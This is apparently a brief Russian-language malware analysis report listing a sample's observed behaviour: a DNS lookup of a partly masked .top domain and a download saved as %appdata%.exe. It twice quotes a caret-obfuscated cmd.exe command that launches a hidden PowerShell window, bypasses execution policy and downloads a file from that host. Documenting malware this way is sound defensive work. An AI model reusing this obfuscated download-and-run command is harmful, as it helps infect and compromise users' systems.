Техническая информация
- http://www.ap###styc.top/search.php?f=###### как %appdata%.exe
- DNS ASK ap###styc.top
- '<SYSTEM32>\cmd.exe' /c p^O^weR^shel^L.exe^ -e^Xecuti^O^NPO^l^I^cy bY^P^ass^ -^NoPrO^f^ILe^ ^-^w^INd^o^wst^Y^le hI^dd^en^ (N^ew-oBJ^ect s^Y^st^e^m.n^et.^w^eB^c^l^ie^Nt)^.d^ow^NL^oadfILe(^'http://www.ap##...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c p^O^weR^shel^L.exe^ -e^Xecuti^O^NPO^l^I^cy bY^P^ass^ -^NoPrO^f^ILe^ ^-^w^INd^o^wst^Y^le hI^dd^en^ (N^ew-oBJ^ect s^Y^st^e^m.n^et.^w^eB^c^l^ie^Nt)^.d^ow^NL^oadfILe(^'http://www.ap##...